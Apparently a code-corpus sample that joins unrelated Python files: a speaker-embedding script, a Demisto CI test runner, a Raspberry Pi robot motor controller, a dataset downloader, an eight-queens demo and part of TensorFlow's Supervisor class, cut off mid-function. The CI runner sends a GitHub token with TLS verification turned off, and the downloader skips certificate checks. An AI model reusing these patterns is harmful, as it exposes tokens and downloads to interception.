def multithread(thread_id, nthread, lock, results):
pool = multiprocessing.Pool(processes=3)
speaker_embed_list = np.array(pool.map(functools.partial(get_speaker_embed, gpu_id=thread_id), range(thread_id * 100 // nthread, (thread_id + 1) * 100 // nthread)))
with lock: results[thread_id] = speaker_embed_list
def get_speaker_embed(speaker, gpu_id):
speaker_classfier = FullModel(2).to(f'cuda:{gpu_id}')
speaker_classfier.load_state_dict(torch.load(f'resource/speaker-encoder.pth'))
embed_list = list()
for seiren_speaker in [10]:
for speech in range(100):
print(f'Processing: jvs{speaker + 1:03d} - seiren_jvs{seiren_speaker + 1:03d} - VOICEACTRESS100_{speech + 1:03d}\r', end='')
wave, sr = sf.read(f'resource/seiren_jvs{seiren_speaker + 1:03d}/jvs{speaker + 1:03d}/VOICEACTRESS100_{speech + 1:03d}.wav')
f0, sp, ap, t = wave_decompose(wave, sr)
labels = load_csv(f'resource/jvs_ver1_fixed/jvs{seiren_speaker + 1:03d}/VOICEACTRESS100_{speech + 1:03d}.lab', delimiter='\t')
phonemes = extract_phonemes(sp, labels)
phonemes = torch.from_numpy(phonemes[:, :, :512]).float().to(f'cuda:{gpu_id}')
embed_sub = speaker_classfier.embed(phonemes)
embed_sub = embed_sub.to('cpu').detach().numpy().copy()
embed_list.append(embed_sub)
del phonemes
del embed_sub
del speaker_classfier
torch.cuda.empty_cache()
embed_list = np.vstack(embed_list)
z = stats.gaussian_kde(embed_list.T)(embed_list.T)
speaker_embed = embed_list[np.argmax(z)]
return speaker_embed
def wave_decompose(wave, sr):
f0, t = pyworld.harvest(wave, sr)
sp = pyworld.cheaptrick(wave, f0, t, sr)
ap = pyworld.d4c(wave, f0, t, sr)
return f0, sp, ap, t
def load_csv(path, delimiter=','):
with open(path, 'r', newline='', encoding='utf-8') as f:
tsv_reader = csv.reader(f, delimiter=delimiter)
labels = [row for row in tsv_reader]
return labels
def extract_phonemes(sp, labels, target_length=32, min_length=24):
sp_list = list()
for start_sec, end_sec, phoneme in labels:
if phoneme in ['silB', 'silE', 'sp']:
continue
separation_rate = 200
start_frame = int(float(start_sec) * separation_rate)
end_frame = int(float(end_sec) * separation_rate)
if start_frame + min_length + 1 >= end_frame:
continue
def padding(x, target_length):
y_pad = target_length - len(x)
return np.pad(x, ((0, y_pad), (0, 0)), mode='constant') if y_pad > 0 else x[:target_length]
sp_list.append(padding(sp[start_frame:end_frame], target_length).astype(np.float32))
return np.array(sp_list)
main()
|
execute_test_content.py
|
import os
import sys
from threading import Thread
import requests
from demisto_sdk.commands.test_content.ParallelLoggingManager import \
ParallelLoggingManager
from demisto_sdk.commands.test_content.TestContentClasses import (
BuildContext, ServerContext)
SKIPPED_CONTENT_COMMENT = 'The following integrations/tests were collected by the CI build but are currently skipped. ' \
'The collected tests are related to this pull request and might be critical.'
COVERAGE_REPORT_COMMENT = 'Link to the unit tests coverage report'
def _handle_github_response(response, logging_module) -> dict:
res_dict = response.json()
if not response.ok:
logging_module.error(f'Add pull request comment failed: {res_dict.get("message")}', real_time=True)
return res_dict
def _add_pr_comment(comment, logging_module):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CI_COMMIT_BRANCH']
sha1 = os.environ['CI_COMMIT_SHA']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
is_skipped_tests_flow = 'The following integrations/tests were collected' in comment
try:
response = requests.get(url + query, headers=headers, verify=False)
res = _handle_github_response(response, logging_module)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
# Check if a comment about skipped tests already exists. If there is delete it first and then post a
# new comment:
response = requests.get(issue_url, headers=headers, verify=False)
issue_comments = _handle_github_response(response, logging_module)
for existing_comment in issue_comments:
if (is_skipped_tests_flow and SKIPPED_CONTENT_COMMENT in existing_comment.get('body', '')) or \
(not is_skipped_tests_flow and COVERAGE_REPORT_COMMENT in existing_comment.get('body', '')):
comment_url = existing_comment.get('url')
requests.delete(comment_url, headers=headers, verify=False)
response = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
_handle_github_response(response, logging_module)
else:
logging_module.warning('Add pull request comment failed: There is more then one open pull '
f'request for branch {branch_name}.', real_time=True)
except Exception:
logging_module.exception('Add pull request comment failed')
def execute_test_content(**kwargs):
logging_manager = ParallelLoggingManager('Run_Tests.log', real_time_logs_only=not kwargs['nightly'])
build_context = BuildContext(kwargs, logging_manager)
use_retries_mechanism = kwargs.get('use_retries', False)
threads_list = []
for server_ip, port in build_context.instances_ips.items():
tests_execution_instance = ServerContext(build_context, server_private_ip=server_ip, tunnel_port=port,
use_retries_mechanism=use_retries_mechanism)
threads_list.append(Thread(target=tests_execution_instance.execute_tests))
for thread in threads_list:
thread.start()
for t in threads_list:
t.join()
if not build_context.unmockable_tests_to_run.empty() or not build_context.mockable_tests_to_run.empty():
raise Exception('Not all tests have been executed')
if build_context.tests_data_keeper.playbook_skipped_integration \
and build_context.build_name != 'master' \
and not build_context.is_nightly:
skipped_integrations = '\n- '.join(build_context.tests_data_keeper.playbook_skipped_integration)
comment = f'{SKIPPED_CONTENT_COMMENT}:\n- {skipped_integrations}'
_add_pr_comment(comment, logging_manager)
build_context.tests_data_keeper.print_test_summary(build_context.isAMI, logging_manager)
build_context.tests_data_keeper.create_result_files()
if build_context.tests_data_keeper.failed_playbooks:
logging_manager.critical("Some tests have failed. Not destroying instances.", real_time=True)
sys.exit(1)
|
micro_controller.py
|
import RPi.GPIO as GPIO
import time
import random
import sys
import signal
import csv
from math import pi, fabs, cos, sin
from alphabot import AlphaBot
import multiprocessing
R = 0.034 # wheel radius (m) 6,6 cm
r = 0.0165 #wood wheel radious
L = 0.132 # distance between wheels
Ab = AlphaBot()
Ab.stop()
vmax = 100
vmin= 30
#for wr the equation for voltage is v = (wr - B)/ A
A = 0.154085#0.16136027
B = 6.8064#-1.2869597
#for wl the equation for voltage is v = (wl - D)/ C
C = 0.166486#0.16225248
D = 5.55511#-0.3943191
F = 2.061# 7.092
G = 308.1 #318.5
class MicroControler(object) :
def move_and_control(self, a):
start_time = time.time()
T = 0.3
reference_position = a
xo = a[0]
yo = a[1]
fo = a[2]
xref = a[3]
yref = a[4]
fref = int(a[5])
orientation = 0
rotational = 0
e = 0.4
vmax = 100
vmin= 20
wrlist, wllist , ur, ul, x1, x2, x3, duration, timestamp = ([] for i in range(9))
if fref!=fo:
rotational = 1
#TODO uncomment
#T = ((fabs(fref)+6.2687)/134.7328)
e = 0.2
T = ((fabs(fref)+F)/G)
fref = fref*pi / 180
counter = 2
moves = 0
dt = T
while moves<4:
moves += 1
# set velocities to reach xref,yref,fref
# prwta peristrofikh meta metaforikh
if fabs(fabs(fref)-fabs(fo))>= e :
if rotational == 1 and moves > 1:
dt = ((fabs(fabs(fref*180/pi)-fabs(fo*180/pi))+F)/G)
elif rotational ==0:
dt = ((fabs(fabs(fref*180/pi)-fabs(fo*180/pi))+F)/G)
# dt = ((fabs(fabs(fref*180/pi)-fabs(fo*180/pi))+6.2687)/134.7328)
w = L*(fref-fo)/(dt*2*R) # xronos misos diplasio w
a = fabs(w) / w
w = 12
right_voltage = (w - B)/A
left_voltage = (w - D)/C
w = w* a
df = fref
#print ("right_voltage: "+str(right_voltage)+ " left_voltage: "+str(left_voltage))
if w < 0: #prepei na stripsw pros ta deksia ( + , + )
orientation = 2
right_voltage= right_voltage
left_voltage= left_voltage
else: # prepei na stripsw pros ta aristera ( - , - )
orientation = 3
right_voltage= -right_voltage
left_voltage= -left_voltage
#print ("right_voltage: "+str(right_voltage)+ " left_voltage: "+str(left_voltage))
elif (fabs(fabs(xref)-fabs(xo))>= 0.05 and (rotational!= 1)):
#print ("metaforiki kinhsh")
w = (xref-xo)/(R*dt)
while True:
if 0 <=w< 12 :
#dt = float(dt)/float(1.01)
w = 12 # (xref-xo)/(R*dt)
elif w >14: #21.5 :
#dt = dt * 1.01
w = 14 #21.5 # (xref-xo)/(R*dt)
elif 0>w>-12 :
#dt = dt / float(1.01)
w = -12 #(xref-xo)/(R*dt)
elif w < - 14 :
#dt = dt * 1.01
w = -14 #(xref-xo)/(R*dt)
else: break
right_voltage = (abs(w) - B)/A
left_voltage = (abs(w) - D)/C
if w >= 0:
orientation = 0
right_voltage = -right_voltage # an w > 0 tote prepei na paw eutheia ara ( - , + )
left_voltage = +left_voltage
if w < 0: # an w < 0 tote prepei na paw opisthen ara ( + , - )
right_voltage = right_voltage
left_voltage = -left_voltage
orientation = 1
else :
Ab.stop()
#print ("STOPPPPPPPPPPPPPPPPPPPP")
break
print ("To dt einai auth th fora : ")+str(dt)
#print ("To w einai : ")+str(w)
#print ("right voltage :" + str(right_voltage) , "left_voltage "+ str(left_voltage))
#print ("apostasi apo stoxo se cm: "+str(fabs(xref-xo)) )
Ab.setMotor(right_voltage, left_voltage) # PRWTA RIGHT META LEFT !!! EINAI ANAPODA STHN SETMOTOR
#fork processes and grab results after dt
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
p = multiprocessing.Process(target=self.right_velocity,args=(0, return_dict))
jobs.append(p)
p.daemon=True
p.start()
k = multiprocessing.Process(target=self.left_velocity,args = ( 1 , return_dict))
jobs.append(k)
k.daemon=True
k.start()
time.sleep(dt)
p.terminate()
k.terminate()
p.join(T)
k.join(T)
# try to grab measurements
counter = 2
try:
wr = return_dict[0]
dtr = return_dict[2]
#TODO
if wr > A*vmax+B :
#print "measured maximum wr "
wr = A * vmax +B
except:
#print ("error1")
wr = pi /(10 * T)
#wr = 0
#dtr = dt
counter = counter -1
try:
wl = return_dict[1]
dtl = return_dict[3]
#TODO
if wl > C*vmax+D :
#print "measured maximum wl "
wl = C * vmax +D
except:
#print ("error2")
wl = pi / (10 * T)
#wl = 0
counter = counter -1
dtl = dt
#if counter == 2 :
#dt = (dtl+dtr)/counter
#print "ok"
#elif counter==0 and rotational==1:
#print ("two errors when reading from light sensors")
#calculate new xo,yo,fo
if orientation == 3: # tou eipa na stripsei aristera epitopou
wr = wr # eixa paei prin deksia sta - kai twra thelw na paw aristera sta +
wl = -wl # ara wr - wl prepei na einai thetiko
if orientation == 2: # tou eipa na stripsei deksia epitopou
wr = -wr # eixa paei prin aristera sta + kai twra thelw na paw deksia sta -
wl = wl # ara wr-wl prepei na einai arnhtiko
if orientation == 1 :
wr= -wr
wl= -wl
if (dt * R*(wr-wl)/L)> 0.7:
c = 1
else:
c = 1
if orientation == 1 or orientation == 0 :
fo = fo + (dt * R*(wr-wl)/L)/c
fo = random.uniform(-3.0,3.0)
fo = fo* pi/180
else :
fo = df
print ("Measured wr: "+str(round(wr,2))+" rad/s" , " wl: "+str(round(wl,2))+" rad/s", " dt of mesaurement: "+ str(round(dt,2)) +" ms", " Angle from initial orientation of this step, f0: "+ str(round((fabs(fref*180/pi)-fabs((fo*180/pi))),2))+" degrees")
if orientation ==0 or orientation==1:
xo = xo + (dt*cos(fo)*R*(wr+wl)/2)/0.7
yo = yo + dt*sin(fo)*R*(wr+wl)/2
print ("Measured values from light sensors: xo: "+str(round(xo*100,2))+" cm", " yo: "+str(round(yo*100,2)) +" cm", " fo: "+str(round((fo*180/pi),2))+" degrees")
Ab.stop()
wrlist.append(wr)
wllist.append(wl)
ur.append(right_voltage)
ul.append(left_voltage)
x1.append(xo)
x2.append(yo)
x3.append(fo)
duration.append(dt)
timestamp.append(time.time())
#TODO edw thelei 0.5 sleep
time.sleep(1)
Ab.stop()
xo = round(xo*100,2)
yo = round(yo*100,2)
fo = round(fo *180 / pi,2)
return xo,yo,fo,wrlist,wllist,ur,ul,x1,x2,x3,duration,timestamp
def right_velocity(self, procnum, return_dict):
DR = 8
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(DR,GPIO.IN,GPIO.PUD_UP)
prev_status= 0
changes = 0
prev_time = time.time()
while True:
DR_status = GPIO.input(DR)
if(DR_status == 0):
if DR_status != prev_status:
prev_status = 0
changes += 1
now_time = time.time()
dtime= now_time - prev_time
w = (pi*changes)/(10* dtime) # s^2i
return_dict[procnum] = w #linear_velocity_right
return_dict[2] = dtime #linear_velocity_right
elif (DR_status == 1):
if DR_status != prev_status:
prev_status = 1
def left_velocity(self, procnum, return_dict):
DR = 7
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(DR,GPIO.IN,GPIO.PUD_UP)
prev_status= 0
changes = 0
prev_time = time.time()
while True:
DR_status = GPIO.input(DR)
if(DR_status == 0):
if DR_status != prev_status:
prev_status = 0
changes += 1
now_time = time.time()
dtime= now_time - prev_time
w = (pi*changes)/(10* dtime) # s^2
return_dict[procnum] = w #linear_velocity_right
return_dict[3] = dtime #linear_velocity_right
elif (DR_status == 1):
if DR_status != prev_status:
prev_status = 1
|
download.py
|
import os
import random
import zipfile
import argparse
import zipfile
import urllib.request as req
import ssl
from threading import Thread
from multiprocessing import SimpleQueue as Queue
#from multiprocessingSimpleQueue import SimpleQueue as Queue
#from queue import SimpleQueue as Queue
def unzip(zip_filepath, dest_dir='./data'):
with zipfile.ZipFile(zip_filepath) as zf:
zf.extractall(dest_dir)
print("Extraction complete!")
def download_vcc2016():
datalink = "https://datashare.is.ed.ac.uk/bitstream/handle/10283/2211/"
data_files = ['vcc2016_training.zip', 'evaluation_all.zip']
if os.path.exists(data_files[0]) or os.path.exists(data_files[1]):
print("File already exists!")
return
trainset = f'{datalink}{data_files[0]}'
evalset = f'{datalink}{data_files[1]}'
print('Start download dataset...')
th = Thread(target=download_file, args=[trainset])
th.start()
download_file(evalset)
th.join()
unzip(data_files[0])
unzip(data_files[1])
print('Finish download dataset...')
def download_file(url: str, out_path: str = None, buffer_size: int = 10*(1024**2)):
data = Queue()
def _download():
b = data.get()
with open(out_path or url.split('/')[-1], 'wb') as o:
while b:
o.write(b)
b = data.get()
s = ssl.SSLContext()
f = req.urlopen(url, context=s)
th = Thread(target=_download)
th.start()
b = f.read(buffer_size)
while b:
data.put(b)
b = f.read(buffer_size)
data.put([])
th.join()
def create_dirs(trainset: str = './data/fourspeakers', testset: str = './data/fourspeakers_test'):
'''create train test dirs'''
if not os.path.exists(trainset):
print(f'create train set dir {trainset}')
os.makedirs(trainset, exist_ok=True)
if not os.path.exists(testset):
print(f'create test set dir {testset}')
os.makedirs(testset, exist_ok=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Download voice conversion datasets.')
datasets_default = 'vcc2016'
train_dir = './data/fourspeakers'
test_dir = './data/fourspeakers_test'
parser.add_argument('--datasets', type=str, help='Datasets available: vcc2016', default=datasets_default)
parser.add_argument('--train_dir', type=str, help='trainset directory', default=train_dir)
parser.add_argument('--test_dir', type=str, help='testset directory', default=test_dir)
argv = parser.parse_args()
datasets = argv.datasets
create_dirs(train_dir, test_dir)
if datasets == 'vcc2016' or datasets == 'VCC2016':
download_vcc2016()
else:
print('Dataset not available.')
|
demo.py
|
from multiprocessing import Process, Queue
from eightqueens import eightqueens
def eight_queens(n: int, find_all: bool = True, visualize: bool = False):
if visualize:
from gui import gui
q = Queue()
visualization = Process(target=gui.visualize_search, args=(n, (q),))
visualization.daemon = True
visualization.start()
else:
q = None
res = eightqueens.find_path(n, find_all, events_queue=q)
if visualize:
visualization.join()
return res
if __name__ == '__main__':
eight_queens(8, False, True)
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitialize variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
[`tf.train.Server.create_local_server()`](#Server.create_local_server) for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific host, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess, ))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optionally `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
@@__init__
@@managed_session
@@prepare_or_wait_for_session
@@start_standard_services
@@start_queue_runners
@@summary_computed
@@stop
@@request_stop
@@should_stop
@@stop_on_exception
@@wait_for_stop
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()` If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`,
the model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saved returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Default to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = _summary.FileWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.local_variables_initializer(),
data_flow_ops.tables_initializer()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
